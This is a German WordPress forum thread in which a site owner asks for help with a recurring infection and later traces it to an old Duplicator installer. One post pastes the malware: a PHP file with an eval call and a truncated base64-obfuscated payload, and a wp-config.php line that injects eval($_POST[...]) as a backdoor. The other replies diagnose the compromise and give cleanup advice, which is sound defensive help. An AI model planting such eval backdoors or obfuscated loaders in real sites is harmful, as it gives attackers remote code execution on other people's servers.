1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

WP 5.1 Vermutlich Virus

Dieses Thema im Forum "Allgemeines" wurde erstellt von jhaustein, 25. Juni 2019.

  1. jhaustein

    jhaustein Well-Known Member

    Registriert seit:
    19. Februar 2011
    Beiträge:
    169
    Zustimmungen:
    0
    Hallo Gemeinschaft .- habe seit gestern abend vermutlich einen virus auf emienm webspace, der ändert die htaccess wp-config - ab - wenn ich aus der datensicherung es wieder zurück spiele, dann geht es für ein bis zei stunden, doch dann gleicher fehler - zusätzlich kommt noch eine php datei in das root verzeichnis

    was kann man da machen
     
  2. Raphael

    Raphael Well-Known Member

    Registriert seit:
    8. September 2005
    Beiträge:
    803
    Zustimmungen:
    17
    Was spielst du genau aus der Datensicherung zurück?
     
  3. jhaustein

    jhaustein Well-Known Member

    Registriert seit:
    19. Februar 2011
    Beiträge:
    169
    Zustimmungen:
    0
  4. Raphael

    Raphael Well-Known Member

    Registriert seit:
    8. September 2005
    Beiträge:
    803
    Zustimmungen:
    17
    Alles was? ;) Alles ist für dich der wp-content Ordner oder die gesamte Installation? Sorry, die Frage klingt blöd, aber meine Kunden haben oft sehr breite Interpretationsspielräume. Daher frage ich immer genau nach.

    Aber: Nehmen wir den Fall, dass du alles (also WP komplett + Datenbank) wieder aufspielst. Und zwar aus einer definitiv sicheren Quelle. Dann würde ich auch mal sehen, ob die .htacess dabei ist, oder nicht. Wenn du dir das Backup über ein Programm wie Filezilla ziehst, könnte das (oder andere versteckte Dateien) z. B. leicht übersehen werden. Mach vielleicht auch mal die .htaccess auf und schau, was da drinnen steht.

    Weiters besteht natürlich die Möglichkeit, dass der Angreifer Passwörter ausgespäht hat und jetzt immer wieder Zugriff hat, weil diese PWer noch nicht getauscht wurden. Daher solltest du alle Passwörter tauschen. Mindestens also: FTP, Datenbank, Alle WP-Nutzer.
     
  5. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    6.400
    Zustimmungen:
    575
    Das Wichtigste wäre das Feststellen und Beseitigen der Sicherheitslücke, sonst passiert das immer wieder.

    Das allgemeine Vorgehen bei einem Hack ist z.B. hier beschrieben.

    Alternativ wende Dich an die Person, die den Website eingerichtet hat oder suche jemanden für eine Ursachensuche und Bereinigung z.B. über die Jobbörse hier im Forum.
     
  6. jhaustein

    jhaustein Well-Known Member

    Registriert seit:
    19. Februar 2011
    Beiträge:
    169
    Zustimmungen:
    0
    es wird eine php datei gerneriert mit nie dem gleichen namen

    inhalt
    <?php
    if (isset($_GET[2343]))
    {
    die(md5(2343));
    }

    eval("\n\$dgreusdi = intval(__LINE__) * 337;");

    $a = "QGluaV9zZXQoJ2Vycm9yX2xvZycsI6745VT674wpOw0KICAgI674Bpbmlfc2V0KCdsb2dfZXJyb3JzJywgMCk7DQogICAgQGluaV9zZXQoJ21heF9leGVjdXRpb25fdGltZScsIDApOw0KICAgI674BzZXRfdGltZV9saW1pdCgwKTsNCg0KDQogICAgJGFwcHJvdmFscyA9I674ZhbHNlOw0KDQogICAgZm9yZWFjaCAoJF9DT09LSUUgYXMgJGNvb2tpZV9vbmU9PiRjb29raWVfdHdvKQ0KICAgIHsNCiAgICAgICAgJGFwcHJvdmFscyA9ICRjb29raWVfdHdvOw0KDQogICAgICAgICRtYW5hZ2VyX2ludml0YXRpb24gPSAkY29va2llX29uZTsNCg0KICAgICAgICAkYXBwcm92YWxzID0gcmVtb3ZlX2xldHRlcihfYmFzZTY0X2RlY29kZSgkYXBwcm92YWxzKSwgJG1hbmFnZXJfaW52aXRhdGlvbik7DQogICAgICAgIA0KICAgICAgICBpZiAoJGFwcHJvdmFscykNCiAgICAgICAgew0KICAgICAgICAgICAgYnJlYWs7DQogICAgICAgIH0NCiAgICB9DQoNCiAgICBmdW5jdGlvbiBpbXByb3ZlX21ldG674oKQ0KICAgIHsNCiAgICAgICAgcmV0dXJuIF9iYXNlNjRfZGVjb2RlKCJVQU1RVjFvT674VnQkxVQXNIRT674xU1h3QVBTb6745WVk6741Q1V3RUxVMTFHUmxnQldGSUgiKTsNCiAgICB9DQoNCiAgICBmdW5jdGlvbiBhcHBlbmRfc3RyaW5ncygkYXBwZW5kLCAkc3RyaW5nKQ0KICAgIHsNCiAgICAgICAgcmV0dXJuICRhcHBlbmQgXiAkc3RyaW5nOw0KICAgIH0NCg0KICAgIGlmICghJGFwcHJvdmFscykNCiAgICB7DQogICAgICAgIGZvcmVhY2ggKCRfU6749TVCBhc

    in der wp-config steht das dann - hat nichts mit meinem server zu tun
    // ** MySQL-Einstellungen ** //
    /** Diese Zugangsdaten bekommst du von deinem Webhoster. **/

    define('DB_NAME', 'dsfs34dfdf');

    /** Ersetze
    username_here mit deinem MySQL-Datenbank-Benutzernamen */
    define('DB_USER', 'c');eval($_POST['earvsqqsv']);//');

    /** Ersetze password_here mit deinem MySQL-Passwort */
    define('DB_PASSWORD', 'asfcvdiHIs8w9821####');

    /**
    Ersetze localhost mit der MySQL-Serveradresse */
    define('DB_HOST', '62.76.46.195');

    /** Der Datenbankzeichensatz der beim Erstellen der Datenbanktabellen verwendet werden soll */
    define('DB_CHARSET', 'utf8');

    /** Der collate type sollte nicht geändert werden */
    define('DB_COLLATE', '');
     
  7. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    6.400
    Zustimmungen:
    575
    Ein (oder auch mehrere) klassische(r) Trojaner bzw. Backdoor.

    Die zu klärende Frage ist, wie bzw. wodurch wird diese Datei generiert und wie erfolgen die Anpassungen in wp-config.php

    Die Zeile mit define('DB_USER', 'c');eval($_POST['earvsqqsv']);//'); deutet auf eine Injection-Möglichkeit bei der Eingabe des Datenbankbenutzers hin, der rot markierte Bereich gehört da nicht hin und ermöglicht dann in der Folge das Ausführen von beliebigem externen PHP-Code.

    Der ganze Server ist als kompromitiert zu betrachten.
     
  8. jhaustein

    jhaustein Well-Known Member

    Registriert seit:
    19. Februar 2011
    Beiträge:
    169
    Zustimmungen:
    0
    heisst - neu aufsetzen - oder gibt es ne kleine möglichkeit
     
  9. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    6.400
    Zustimmungen:
    575
    Entweder Du machst selbst exakt das im o.g. Link beschriebene "weitere Vorgehen" oder Du lässt einen Fachmann ran, der das für Dich macht, poste eine entspr. Anfrage in der Jobbörse im Forum, dann bekommst Du sicher Angebote.
     
  10. jhaustein

    jhaustein Well-Known Member

    Registriert seit:
    19. Februar 2011
    Beiträge:
    169
    Zustimmungen:
    0
    alles wieder am laufen - lag am duplicator (installer) - puh ein glück :)
     
  11. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    6.400
    Zustimmungen:
    575
    Danke für das Feedback. Welche genaue Duplicator Version wurde denn für das Erstellen des Paketes eingesetzt? Hier wird z.B. ein solcher Angriffsvektor für eine ältere Version beschrieben.
     
  12. jhaustein

    jhaustein Well-Known Member

    Registriert seit:
    19. Februar 2011
    Beiträge:
    169
    Zustimmungen:
    0
    kann es dir leider nicht mehr sagen - habe ihn komplett gelöscht
     
  13. b3317133

    b3317133 Well-Known Member

    Registriert seit:
    21. November 2014
    Beiträge:
    6.400
    Zustimmungen:
    575
    Ok. War dann wohl schon vergleichsweise älter, denn dieses "Injection"-Problem ist offenbar schon eine Weile bekannt/behoben.

    Über die o.g. Backdoor kann sich übrigens alles Mögliche eingenistet haben, ein kompletter Abgleich aller Ordner und Dateien des gesamten Webspace mit sauberen Versionen und neue Benutzerkennwörter sind daher dringend anzuraten.

    Generell, nach einer Duplicator-Installation sollte durch diverse Hinweise und Mechanismen nach dem Login eigentlich auf das nötige Bereinigen/Entfernen der Installer-Reste hingewiesen worden sein, sowas sollte man beachten.
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden